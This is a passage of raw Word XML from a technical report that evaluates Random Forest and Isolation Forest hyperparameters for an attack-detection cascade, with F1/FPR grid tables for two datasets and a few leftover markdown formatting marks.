        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">study — by construction.** In sklearn, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>contamination</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> does not affect the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">fitted trees at all: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>score_samples</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is contamination-independent, and the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>parameter only sets the decision threshold (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>offset_</w:t>
      </w:r>
      <w:r>
        <w:t>) at the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>contamination-quantile of training scores. Our production wrapper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IsolationForestDetector</w:t>
      </w:r>
      <w:r>
        <w:t>) additionally thresholds a min-max-normalised</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">score at a fixed 0.5, so sweeping contamination </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>through the wrapper</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> would</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>return four identical rows. Each contamination value is therefore evaluated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">at its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>own calibrated threshold</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (sklearn's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>predict</w:t>
      </w:r>
      <w:r>
        <w:t>, i.e. "flag the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>top-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>contamination</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fraction of benign-training scores") — which is what</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the knob actually means. The sweep verifies the mechanics empirically:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ROC-AUC is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>identical to 4 decimals across all contamination values</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(D1: 0.8120, D2: 0.6768; asserted in the sweep script).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Headline answers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Random Forest F1 is saturated; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_depth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the only lever, and it moves</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>FPR more than F1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> The entire 12-config grid spans just </w:t>
      </w:r>
      <w:r>
        <w:t>0.780–0.801** F1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">on D1 and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.731–0.758</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on D2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_depth=20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> **dominates on both</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>datasets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t>and* the lowest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>FPR (D1: FPR 0.031 vs 0.052 at depth 10, a ~40% reduction in false alarms).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Isolation Forest </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>contamination</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a false-alarm budget dial, nothing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>more.** FPR tracks contamination almost exactly (D1: 0.047/0.088/0.189/0.287</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>for c = 0.05/0.10/0.20/0.30) while the learned model is provably unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>F1 is poor at every setting (peak 0.641 D1 / 0.462 D2), and even the most</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">permissive setting (c = 0.30) reaches only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.73 / 0.56 recall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — far below</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the ≈0.99 attack retention a stage-1 filter needs. This is precisely why the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cascade does not use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>contamination</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at all: it calibrates its clearing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>threshold on the attack-score quantile (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>stage1_retain_recall=0.99</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/ensemble.py</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Random Forest — full grid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fixed (production values, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/models.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>min_samples_leaf=1</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_features="sqrt"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>class_weight="balanced_subsample"</w:t>
      </w:r>
      <w:r>
        <w:t>. Cells are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F1 / FPR</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 1</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n_estimators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_depth=None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_depth=10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_depth=20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7806 / 0.0411</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7801 / 0.0525</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7926 / 0.0372</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7843 / 0.0402</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7840 / 0.0533</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7963 / 0.0337</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7845 / 0.0442</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7868 / 0.0525</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7988 / 0.0310</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>500</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7850 / 0.0424</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7876 / 0.0525</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8006 / 0.0310</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 2</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n_estimators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_depth=None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_depth=10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_depth=20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7419 / 0.0585</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7430 / 0.0870</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7514 / 0.0529</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7393 / 0.0571</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7356 / 0.0794</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7503 / 0.0515</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7435 / 0.0536</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7347 / 0.0766</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7559 / 0.0515</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
